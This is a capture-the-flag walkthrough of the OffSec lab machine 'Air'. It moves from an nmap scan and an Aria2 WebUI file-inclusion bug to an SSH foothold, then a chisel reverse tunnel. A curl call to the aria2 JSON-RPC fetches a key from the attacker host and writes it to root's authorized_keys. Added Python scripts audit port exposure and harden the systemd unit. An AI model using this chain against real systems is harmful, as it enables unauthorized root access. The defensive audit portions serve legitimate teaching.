Key points
- Port forwarding
Steps
Step one is the nmap scan: not many leads, but clear ones.
Nmap scan report for 192.168.55.100
Host is up (0.00075s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
8888/tcp open sun-answerbook?
Port 8888 runs an Aria2 WebUI that frequently throws errors. A quick search turns up a local file inclusion vulnerability; exploiting it yields the key file under deathflash/.ssh/, which can be used to log in, and also gives the first flag.
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ssh -i id_rsa deathflash@192.168.110.100
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-118-generic x86_64)
......
......
Last login: Sun Oct 20 13:10:43 2024 from 192.168.45.152
deathflash@air:~$ id
uid=1000(deathflash) gid=1000(deathflash) groups=1000(deathflash)
Upload linpeas.sh and run it.
......
......
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
......
......
root 988 17.9 0.8 61704 16864 ? Ss 13:09 5:43 /usr/bin/aria2c --enable-rpc --rpc-listen-all=true --rpc-allow-origin-all=true --rpc-secret=**************
......
......
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6800 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8888 :::* LISTEN 1008/node
tcp6 0 0 :::6800 :::* LISTEN -
aria2c is running as root, but we do not have the rpc-secret yet. Port 6800 is also listening, even though it did not show up in the nmap enumeration, so we can use port forwarding to bring the remote server's port 6800 to the local server. Let's do it step by step.
First, run the following commands on the remote server to obtain the rpc-secret.
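The gap between the external nmap result (22 and 8888 open, everything else filtered) and the host's own listening sockets (6800 on all interfaces, 53 on loopback) is the whole reason port forwarding matters here: a host firewall hides a service from outside, but not from anyone who already has a shell on the box. The following Python script is an added example, not part of the original writeup, that makes that comparison explicit from a defender's side. It parses netstat-style LISTEN rows (the sample is constructed to match the six lines above) and splits ports into externally exposed, wildcard-bound but unanswered from outside, and loopback-only; the last two groups are what an audit should treat as reachable once a foothold exists.

```python
from dataclasses import dataclass

# Constructed sample, modelled on the netstat-style "Active Ports" listing
# that linpeas printed on the remote host (same six rows, same format).
NETSTAT_SAMPLE = """\
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6800 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8888 :::* LISTEN 1008/node
tcp6 0 0 :::6800 :::* LISTEN -
"""

# Ports the external nmap scan reported as open (taken from the scan above).
EXTERNAL_OPEN = {22, 8888}


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    process: str  # "-" when netstat could not read the owner (unprivileged run)


def parse_listeners(text):
    """Parse LISTEN rows of `netstat -tln` style output into Listener records."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[5] != "LISTEN":
            continue
        # Local address is "addr:port"; rpartition copes with IPv6 such as ":::6800".
        addr, _, port = parts[3].rpartition(":")
        process = parts[6] if len(parts) > 6 else "-"
        listeners.append(Listener(parts[0], addr, int(port), process))
    return listeners


def is_loopback(addr):
    return addr.startswith("127.") or addr == "::1"


def classify(listeners, external_open):
    """Group listening ports by how reachable they are from outside the host."""
    groups = {"exposed": set(), "firewalled": set(), "loopback": set()}
    for l in listeners:
        if is_loopback(l.addr):
            groups["loopback"].add(l.port)     # only reachable from the host itself
        elif l.port in external_open:
            groups["exposed"].add(l.port)      # answered the external scan
        else:
            groups["firewalled"].add(l.port)   # wildcard bind, no external response
    return groups


def pivot_reachable(groups):
    """Ports that become reachable once someone has a shell on the host,
    e.g. through a reverse tunnel like the chisel R:6800:127.0.0.1:6800 used later."""
    return groups["firewalled"] | groups["loopback"]


if __name__ == "__main__":
    groups = classify(parse_listeners(NETSTAT_SAMPLE), EXTERNAL_OPEN)
    for name, ports in groups.items():
        print(f"{name:10s} {sorted(ports)}")
    print("reachable via pivot:", sorted(pivot_reachable(groups)))
```

For the sample above this reports 22 and 8888 as exposed, 6800 as firewalled and 53 as loopback, so 53 and 6800 are the pivot-reachable set. The practical lesson for a host owner is that a filtered port is not an authenticated port: anything in that set needs its own access control (here, a secret that is not readable by every local user), not just a firewall rule.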
deathflash@air:~$ find / -type f -name "aria*" 2>/dev/null
/etc/systemd/system/aria2.service
......
......
deathflash@air:~$ cat /etc/systemd/system/aria2.service
[Unit]
Description=Aria2c Download Manager
After=network.target
[Service]
ExecStart=/usr/bin/aria2c --enable-rpc --rpc-listen-all=true --rpc-allow-origin-all=true --rpc-secret=mEHNghqcNiF3KV
Restart=on-failure
User=root
Group=root
[Install]
WantedBy=multi-user.target
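The unit file above combines four weaknesses that the rest of the writeup depends on: the service runs as root, the RPC listener is bound to every interface, the secret sits on the command line in a world-readable unit file (linpeas masked it in the process list, but `cat` on the unit reveals it), and no download directory or filesystem sandbox limits where aria2 may write. The Python script below is an added example, not part of the original writeup or of aria2, that audits a systemd unit for exactly those conditions and shows a hardened unit beside the weak one. The hardened unit is an assumption of mine: it uses a dedicated `aria2` user, moves the secret into an aria2 configuration file via `--conf-path`, confines downloads with `--dir`, and uses systemd's `ProtectSystem=strict` plus `ReadWritePaths` so the process cannot write outside its own data directory regardless of what `out` is set to.

```python
import shlex

# Constructed copy of the weak unit from the writeup; the secret is a placeholder.
WEAK_UNIT = """\
[Unit]
Description=Aria2c Download Manager
After=network.target
[Service]
ExecStart=/usr/bin/aria2c --enable-rpc --rpc-listen-all=true --rpc-allow-origin-all=true --rpc-secret=REDACTED_SECRET
Restart=on-failure
User=root
Group=root
[Install]
WantedBy=multi-user.target
"""

# Hardened alternative (my assumption, not from the page). The secret lives in
# /etc/aria2/aria2.conf as "rpc-secret=..." with mode 0640 root:aria2, so it is
# neither in the unit file nor in /proc/<pid>/cmdline. rpc-listen-all defaults
# to false, so RPC only answers on loopback.
HARDENED_UNIT = """\
[Unit]
Description=Aria2c Download Manager
After=network.target
[Service]
ExecStart=/usr/bin/aria2c --enable-rpc --conf-path=/etc/aria2/aria2.conf --dir=/var/lib/aria2/downloads
Restart=on-failure
User=aria2
Group=aria2
ProtectSystem=strict
ProtectHome=yes
ReadWritePaths=/var/lib/aria2
NoNewPrivileges=yes
[Install]
WantedBy=multi-user.target
"""


def parse_unit(text):
    """Minimal INI-style parser: {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        key, _, value = line.partition("=")
        sections.setdefault(current, {})[key.strip()] = value.strip()
    return sections


def exec_flags(execstart):
    """Turn 'aria2c --a --b=c' into {'a': 'true', 'b': 'c'}."""
    flags = {}
    for arg in shlex.split(execstart)[1:]:
        if arg.startswith("--"):
            name, _, value = arg[2:].partition("=")
            flags[name] = value or "true"
    return flags


def audit_unit(text):
    """Return the list of weaknesses found; an empty list means the unit passes."""
    service = parse_unit(text).get("Service", {})
    flags = exec_flags(service.get("ExecStart", ""))
    findings = []
    if service.get("User", "root") == "root":
        findings.append("runs-as-root")            # any write becomes a root write
    if flags.get("rpc-listen-all") == "true":
        findings.append("rpc-listen-all")          # RPC reachable from every interface
    if "rpc-secret" in flags:
        findings.append("secret-on-cmdline")       # readable via unit file and ps
    if "dir" not in flags:
        findings.append("no-download-dir")         # downloads land wherever cwd points
    if service.get("ProtectSystem") != "strict":
        findings.append("no-fs-sandbox")           # no systemd write restriction
    return findings


if __name__ == "__main__":
    print("weak unit    :", audit_unit(WEAK_UNIT))
    print("hardened unit:", audit_unit(HARDENED_UNIT))
```

Running the audit against the weak unit yields all five findings; against the hardened unit it yields none. The ordering of importance is the service user and the filesystem sandbox: with `User=aria2` and `ProtectSystem=strict`, a leaked RPC secret still only lets a caller write into `/var/lib/aria2`, which removes the root-level impact the writeup goes on to demonstrate.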
Run the chisel server locally.
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ./chisel server --reverse --port 9000
2024/10/20 09:10:15 server: Reverse tunnelling enabled
2024/10/20 09:10:15 server: Fingerprint C1bNBRXO8Jpi0ZA80jR8Y4ztA6wZVP0eXLvpvXM6fqk=
2024/10/20 09:10:15 server: Listening on http://0.0.0.0:9000
2024/10/20 09:12:55 server: session#1: tun: proxy#R:6800=>6800: Listening
Run the chisel client on the remote server.
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ssh -i id_rsa deathflash@192.168.110.100
The authenticity of host '192.168.110.100 (192.168.110.100)' can't be established.
ED25519 key fingerprint is SHA256:EcFUQ3abooLm3ZmBChJ1yx8VqJ5nj/Htk22+PfBdxUo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:41: [hashed name]
~/.ssh/known_hosts:61: [hashed name]
~/.ssh/known_hosts:62: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.100' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-118-generic x86_64)
......
......
deathflash@air:~$ wget 192.168.45.152/chisel
--2024-10-20 13:11:03-- http://192.168.45.152/chisel
Connecting to 192.168.45.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M) [application/octet-stream]
Saving to: ‘chisel’
chisel 100%[========================================================================================================================================>] 8.94M 326KB/s in 26s
2024-10-20 13:11:29 (358 KB/s) - ‘chisel’ saved [9371800/9371800]
deathflash@air:~$ chmod +x chisel
deathflash@air:~$ chisel client 192.168.45.152:9000 R:6800:127.0.0.1:6800
chisel: command not found
deathflash@air:~$ ls -l
total 9164
-rwxrwxr-x 1 deathflash deathflash 9371800 Oct 18 15:09 chisel
-r-------- 1 deathflash deathflash 33 Oct 20 13:09 local.txt
deathflash@air:~$ ./chisel client 192.168.45.152:9000 R:6800:127.0.0.1:6800
2024/10/20 13:12:44 client: Connecting to ws://192.168.45.152:9000
2024/10/20 13:12:50 client: Connected (Latency 1.26550807s)
An nmap scan of the local server now shows that the remote server's port 6800 has been mapped through the tunnel.
PORT STATE SERVICE VERSION
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
|_http-cors: GET POST OPTIONS
......
......
In the WebUI, change the Connection Settings so that the JSON-RPC path points at local port 6800.
Searching for "aria jsonrpc download file" turns up an example. With a few changes, it can be used through curl to download a file from the local server and save it on the remote server. Since aria2 on the remote server was started by root, in theory any file can be overwritten.
Run the following curl command on the remote server. The id_rsa.pub can be reused directly from the one retrieved earlier out of the deathflash user's .ssh directory. (Note: if a proxy is configured in the local openvpn file, comment it out and reconnect the VPN, otherwise the download will fail.)
curl --location 'http://localhost:6800/jsonrpc' \
--header 'Content-Type: application/json' \
--data '{
"jsonrpc": "2.0",
"id": "root",
"method": "aria2.addUri",
"params": [
"token:mEHNghqcNiF3KV",
[
"http://192.168.45.152/id_rsa.pub"
],
{
"out": "/root/.ssh/authorized_keys"
}
]
}'
Wait a moment, then log in as root using the deathflash user's id_rsa as the credential. Success.
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ssh -i id_rsa root@192.168.110.100
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-118-generic x86_64)
......
......
Last login: Tue Aug 27 16:23:42 2024
root@air:~# cat /root/proof.txt
5657ab9b4f910de09190cd605a6b5349